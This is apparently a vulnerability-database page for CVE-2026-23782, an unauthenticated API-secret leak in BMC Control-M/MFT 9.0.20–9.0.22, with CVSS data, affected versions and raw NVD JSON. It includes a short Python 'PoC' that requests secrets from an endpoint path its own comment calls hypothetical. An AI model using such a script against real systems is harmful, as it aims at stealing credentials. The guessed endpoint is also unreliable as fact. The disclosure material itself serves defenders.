Security Vulnerability Report
CVE-2026-23782 CVSS 7.5 HIGH

CVE-2026-23782

Published: 2026-04-10 15:16:23
Last Modified: 2026-04-27 19:11:47

Description

An issue was discovered in BMC Control-M/MFT 9.0.20 through 9.0.22. An API management endpoint allows unauthenticated users to obtain both an API identifier and its corresponding secret value. With these exposed secrets, an attacker could invoke privileged API operations, potentially leading to unauthorized access.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:bmc:control-m\/managed_file_transfer:*:*:*:*:*:*:*:* - VULNERABLE
BMC Control-M/MFT 9.0.20
BMC Control-M/MFT 9.0.21
BMC Control-M/MFT 9.0.22

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests


def exploit_cve_2026_23782(target_url):
    """
    PoC for CVE-2026-23782: Attempts to retrieve API secrets
    from the exposed management endpoint.
    """
    # Hypothetical vulnerable endpoint path based on vulnerability description
    vuln_endpoint = f"{target_url}/api/management/secret_exposure"
    headers = {"User-Agent": "CVE-2026-23782-Scanner"}
    try:
        # Sending unauthenticated request
        response = requests.get(vuln_endpoint, headers=headers, timeout=10)
        if response.status_code == 200:
            print("[+] Vulnerability confirmed!")
            print("[+] API Identifier and Secret leaked:")
            print(response.text)
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
    except Exception as e:
        print(f"[-] An error occurred: {e}")


if __name__ == "__main__":
    target = "http://vulnerable-host:8080"  # Replace with actual target
    exploit_cve_2026_23782(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-23782", "sourceIdentifier": "[email protected]", "published": "2026-04-10T15:16:23.210", "lastModified": "2026-04-27T19:11:46.547", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in BMC Control-M/MFT 9.0.20 through 9.0.22. An API management endpoint allows unauthenticated users to obtain both an API identifier and its corresponding secret value. With these exposed secrets, an attacker could invoke privileged API operations, potentially leading to unauthorized access."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:bmc:control-m\\/managed_file_transfer:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.0.20", "versionEndIncluding": "9.0.22", "matchCriteriaId": "F19C6505-D28F-4BF0-B347-789719492E0E"}]}]}], "references": [{"url": "https://docs.bmc.com/xwiki/bin/view/Control-M-Orchestration/Control-M/ctm9021/Patches/Control-M-Server-PACTV-9-0-21-308/?srid=ab0apVT3", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://www.bmc.com/support/resources/issue-defect-management.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}